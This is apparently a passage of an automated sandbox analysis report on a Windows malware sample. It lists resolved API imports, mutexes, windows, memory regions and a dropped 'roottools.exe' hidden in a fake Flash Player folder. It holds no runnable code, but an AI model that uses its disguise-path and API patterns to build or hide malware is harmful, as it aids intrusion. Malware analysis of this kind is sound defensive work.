Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x759ed4dc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x759d14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x759d4a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x759ed9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x759d59e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x759d4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x759d1462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x759ec860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x759d4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x759d34c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x759d34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x759d1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x759d492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x759f8baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x759f896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x759d11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x759f735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x759d3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x759d424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x759d16dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x759d16c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x759d183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x759d1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x759d4220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x759d110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x759d186e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x758e49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x758e8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x758dfbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x758e1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ce25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x758d8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x758d9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x758e2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x758e3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75931a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x758d7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x758e05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x758d787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x758db17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x758e6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x758dd156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x758df350	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x76256c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x7624d718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7775469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x777545f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7776779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x77750e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x777540e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x77750e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x77752a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x777540fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x7774c54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x77749fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x7774f4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7774df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7774df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x77754680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x777514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7774df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x77754304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x7775412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x77754620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7775468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x7774c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x7775432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x777546ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7774e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x7775431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x7774c51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x7775418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x7775415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x77754608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x777541b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x7775413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x7774cf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7776773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x7774e15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x777546e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x7775445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7779db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7774df14	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x76a83c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76a91e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76af5708	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x763845bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x763855bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x763acd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x76384745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x763ad32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x763846e9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x763886f7	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x7638c39c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76383248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x7638c177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x763b066c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x76385331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x7639fbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7638a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x7637fcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x7639edfe	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x7637ff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x76385c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x7639c6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x763ace21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x75ad13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x75afe599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x75b209ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x75b0363b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75af5ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75b29d0b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x75b286d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x76965689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x76964de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7696e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x769654f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x76964f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x76965f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x76965ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x769658b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x75f449e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75f3b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x75f3a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75f31b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75f44c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x75f2d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x75f375e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75f4f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75f3ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x75fb18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x766c1d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x761b3eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x7582a415	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = RtlDosPathNameToNtPathName_U, address_out = 0x77d0ce41	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtCreateFile, address_out = 0x77cd00a4	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtClose, address_out = 0x77ccf9d0	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQueryEaFile, address_out = 0x77cd1314	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtSetEaFile, address_out = 0x77cd19b0	1	Fn

Window (5)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	class_name = ThunderRT6Main, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBMsoStdCompMgr, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBFocusRT6, wndproc_parameter = 0	1	Fn
Create	Langskallet7	wndproc_parameter = 0	1	Fn
Set Attribute	-	class_name = VBMsoStdCompMgr, index = 0, new_long = 40706204	1	Fn

Keyboard (1)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721		1	Fn

System (45)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = YKYD69Q	1	Fn
Sleep	duration = 15 milliseconds (0.015 seconds)	32	Fn
Sleep	duration = 8000 milliseconds (8.000 seconds)	1	Fn
Sleep	duration = -1 (infinite)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:56:58 (UTC)	1	Fn
Get Info	type = Operating System	3	Fn
Get Info	type = Operating System	5	Fn
Get Info	type = Hardware Information	1	Fn

Mutex (4)

Operation	Additional Information	Count	Logfile
Create	-	1	Fn
Create	mutex_name = 9B4D68961731FE3C22DA08B640799EB6	1	Fn
Open	mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE	1	Fn
Release	mutex_name = 9B4D68961731FE3C22DA08B640799EB6	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data
Get Environment String	name = ComSpec, result_out = C:\Windows\system32\cmd.exe		1	Fn

Process #22: roottools.exe

(Host: 673, Network: 0)

Information	Value
ID	#22
File Name	c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe
Command Line	"C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"
Initial Working Directory	C:\Users\aETAdzjz\AppData\Roaming\
Monitor	Start Time: 00:05:28, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:04:45

OS Process Information

Information	Value
PID	0x7e8
Parent PID	0x594 (c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 7B4 0x 6A8 0x 114 0x 718 0x 7B0

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x0025ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000210000	0x00210000	0x0021ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000240000	0x00240000	0x00247fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000250000	0x00250000	0x0025ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000260000	0x00260000	0x00260fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000280000	0x00280000	0x002fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000300000	0x00300000	0x003affff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000300000	0x00300000	0x0033ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000370000	0x00370000	0x003affff	Private Memory	Readable, Writable	Region Actions
rsaenh.dll	0x003b0000	0x003ebfff	Memory Mapped File	Readable	Region Actions
roottools.exe	0x00400000	0x00432fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000400000	0x00400000	0x0041bfff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000420000	0x00420000	0x0045ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000440000	0x00440000	0x004effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000460000	0x00460000	0x0049ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004b0000	0x004b0000	0x004effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000520000	0x00520000	0x0061ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000620000	0x00620000	0x006fefff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000770000	0x00770000	0x0077ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000780000	0x00780000	0x00907fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000910000	0x00910000	0x00a90fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000aa0000	0x00aa0000	0x01e9ffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001ea0000	0x01ea0000	0x0229ffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x022a0000	0x0256efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002570000	0x02570000	0x0278ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002570000	0x02570000	0x026fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002570000	0x02570000	0x025effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000025f0000	0x025f0000	0x026effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000026f0000	0x026f0000	0x026fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002750000	0x02750000	0x0278ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002790000	0x02790000	0x02b82fff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x02b90000	0x034bffff	Memory Mapped File	Readable	Region Actions
private_0x00000000034c0000	0x034c0000	0x0364ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000034c0000	0x034c0000	0x035dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003610000	0x03610000	0x0364ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003650000	0x03650000	0x0b64ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x000000000b750000	0x0b750000	0x0b84ffff	Private Memory	Readable, Writable	Region Actions
private_0x000000000b850000	0x0b850000	0x0b94ffff	Private Memory	Readable, Writable	Region Actions
msvbvm60.dll	0x72940000	0x72a92fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x74130000	0x74142fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x741b0000	0x7422ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x743d0000	0x743d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x743e0000	0x7443bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74440000	0x7447efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sxs.dll	0x74e30000	0x74e8efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dhcpcsvc.dll	0x74fd0000	0x74fe1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x75630000	0x7566afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x75670000	0x75685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x75690000	0x75697fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x756b0000	0x756cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x756e0000	0x756e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75800000	0x7580bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75810000	0x7586ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x758c0000	0x759bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759c0000	0x75acffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x75ad0000	0x75ad4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75ae0000	0x75c3bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75c40000	0x75e3afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75e70000	0x75f1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75f20000	0x76014fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x760b0000	0x7610ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76110000	0x761acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x761b0000	0x7623efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x76240000	0x7635cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x76360000	0x7636bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76370000	0x763c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76570000	0x7663bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76640000	0x76685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76690000	0x767c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x767d0000	0x767e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x767f0000	0x767f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76800000	0x768effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x768f0000	0x768f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76950000	0x769dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x76a70000	0x776b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x77740000	0x777dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x777e0000	0x77814fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000778b0000	0x778b0000	0x779a9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000779b0000	0x779b0000	0x77acefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77ad0000	0x77c78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77cb0000	0x77e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Host Behavior

File (8)

Operation	Filename	Additional Information	Count	Logfile
Create	\??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Get Info	\??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	type = extended	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn

Registry (9)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
